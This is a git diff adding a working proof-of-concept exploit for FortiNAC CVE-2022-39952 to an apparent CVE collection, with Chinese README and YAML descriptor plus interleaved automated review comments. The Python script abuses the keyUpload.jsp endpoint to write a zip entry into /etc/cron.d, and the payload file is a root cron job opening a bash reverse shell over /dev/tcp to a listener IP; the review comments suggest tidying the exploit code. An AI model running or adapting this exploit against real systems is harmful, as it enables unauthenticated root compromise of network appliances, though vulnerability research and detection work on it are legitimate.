diff --git a/cve/fortinac/2022/CVE-2022-39952/CVE-2022-39952.py b/cve/fortinac/2022/CVE-2022-39952/CVE-2022-39952.py
new file mode 100644
index 0000000000000000000000000000000000000000..b5cd9247fbd7fe777cf93ec235aaec0ac5324f9b
--- /dev/null
+++ b/cve/fortinac/2022/CVE-2022-39952/CVE-2022-39952.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python3
+import argparse
+import requests
+import zipfile
+import urllib3
+urllib3.disable_warnings()
+
+
+def exploit(target):
+    url = f'https://{target}:8443/configWizard/keyUpload.jsp'
+    r = requests.post(url, files={'key': open('payload.zip', 'rb')}, verify=False)
+    if 'SuccessfulUpload' in r.text:
+        print(f'[+] Payload successfully delivered')
+
+def make_zip(payload_file):
+    fullpath = '/etc/cron.d/payload'
+    zf = zipfile.ZipFile('payload.zip', 'w')
+    zf.write(payload_file, fullpath)
+    zf.close()
+    print(f'[+] Wrote {payload_file} to {fullpath}')
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
+    parser.add_argument('-f', '--file', help='The cronjob payload file', required=True)
+    args = parser.parse_args()
+
+    make_zip(args.file)
+    exploit(args.target)
diff --git a/cve/fortinac/2022/CVE-2022-39952/README.md b/cve/fortinac/2022/CVE-2022-39952/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..a8c77c69d0840c40a4769a6bee8055c996f1d4eb
--- /dev/null
+++ b/cve/fortinac/2022/CVE-2022-39952/README.md
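Review bot: In `exploit`, `open('payload.zip', 'rb')` is handed straight to `files=` and never closed, so the handle lives until the interpreter exits; `make_zip` hand-rolls the same cleanup with `zf.close()`. Use a context manager in both places, e.g. `with open('payload.zip', 'rb') as fh:` / `r = requests.post(url, files={'key': fh}, verify=False)` and `with zipfile.ZipFile('payload.zip', 'w') as zf:`. The success `print` uses an f-string with no placeholders and can be a plain string literal. The module also has no docstring; one that records the observable artifacts already present in the code — the POST to `/configWizard/keyUpload.jsp` on port 8443, the `SuccessfulUpload` response marker, and the `/etc/cron.d/payload` entry name inside the uploaded zip — would give defenders reading this PoC the indicators to alert on, next to the FG-IR-22-300 advisory the README points to.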
@@ -0,0 +1,45 @@
+#CVE-2022-39952
+
+CVE-2022-39952的POC影响Fortinet FortiNAC
+
+
+
+此漏洞的默认配置编写cron作业以创建
+
+反向外壳。确保更改“有效负载”文件以适合您的环境。
+
+
+
+##技术分析
+
+可以在我们的博客上找到漏洞和危害指标的技术根源分析:
+
+https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs
+
+
+
+##摘要
+
+这个POC滥用keyUpload.jsp端点来实现任意文件写入。
+
+
+
+##用途
+
+```明文
+
+root@kali:~/CVE-2022-39952#python3 CVE-2022-39952py--目标10.0.40.85--文件负载
+
+[+]将负载写入/etc/cron.d/payload
+
+[+]有效负载已成功传递
+
+```
+
+
+
+##解决措施
+
+按照PSIRT中的说明更新至最新版本
+
+https://www.fortiguard.com/psirt/FG-IR-22-300
\ No newline at end of file
diff --git a/cve/fortinac/2022/CVE-2022-39952/payload b/cve/fortinac/2022/CVE-2022-39952/payload
new file mode 100644
index 0000000000000000000000000000000000000000..9c773e1696d7a5cb446af93a059157c03f7f7941
--- /dev/null
+++ b/cve/fortinac/2022/CVE-2022-39952/payload
@@ -0,0 +1 @@
+* * * * * root bash -i >& /dev/tcp/10.0.40.83/443 0>&1
diff --git a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..98f30f02ba92e521ad0838c5cfcfde8a71db96b7
--- /dev/null
+++ b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml
@@ -0,0 +1,28 @@
+id: CVE-2022-39952
+source: https://github.com/horizon3ai/CVE-2022-39952
+info:
+  name: FortiNAC是Fortinet的网络访问控制增强安全结构的解决方案可见性、控制和自动响应连接到网络的所有内容。FortiNAC提供针对物联网威胁的保护,将控制扩展到第三方设备,以及协调自动响应到广泛的一系列社交活动。
+  severity: critical
+  description: |
+    该漏洞是由于FortiNAC keyUpload脚本中存在路径遍历漏洞,未经身份认证的远程攻击者可利用此漏洞向目标系统写入任意内容,最终可在目标系统上以 Root 权限执行任意代码。
+  scope-of-influence:
+    FortiNAC version 9.4.0
+    FortiNAC version 9.2.0 至 9.2.5
+    FortiNAC version 9.1.0 至 9.1.7
+    FortiNAC 8.8 所有版本
+    FortiNAC 8.7 所有版本
+    FortiNAC 8.6 所有版本
+    FortiNAC 8.5 所有版本
+    FortiNAC 8.3 所有版本
+  reference:
+    - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs
+    - https://www.fortiguard.com/psirt/FG-IR-22-300
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-39952
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-39952
+    cwe-id: CWE-610
+    cnvd-id: None
+    kve-id: None
+  tags: 远程代码执行漏洞
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index d83e8b4f7d85f277310e0c2a15fed2adec5b3dff..22b380b0cbcb7221f4b7d9e2905624b2a29d54f7 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -93,6 +93,8 @@ cve:
     - CVE-2021-3517
     - CVE-2021-3518
     - CVE-2021-3537
+  fortinac:
+    - CVE-2022-39952
   redis:
     - CVE-2022-31144
   java-spring:
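Review bot: Under `scope-of-influence:` the eight version lines carry no `- ` prefix, unlike `reference:` further down, so a YAML parser folds them into a single plain scalar (`FortiNAC version 9.4.0 FortiNAC version 9.2.0 至 9.2.5 …`) instead of a list; if the field is meant to enumerate affected versions, prefix each line with `- `, or use a `|` block scalar as `description:` already does. `cnvd-id: None` and `kve-id: None` parse as the string `None`, not a null — `null` or `~` is the YAML spelling if "no id" is intended, assuming the repo's other descriptors do not depend on the literal string. The `name:` value is a paragraph describing the product; a short product name there, with the prose moved under `description:`, would match how that key is usually read. I cannot see the repo's other descriptor files, so treat these as conventions to confirm rather than certain defects.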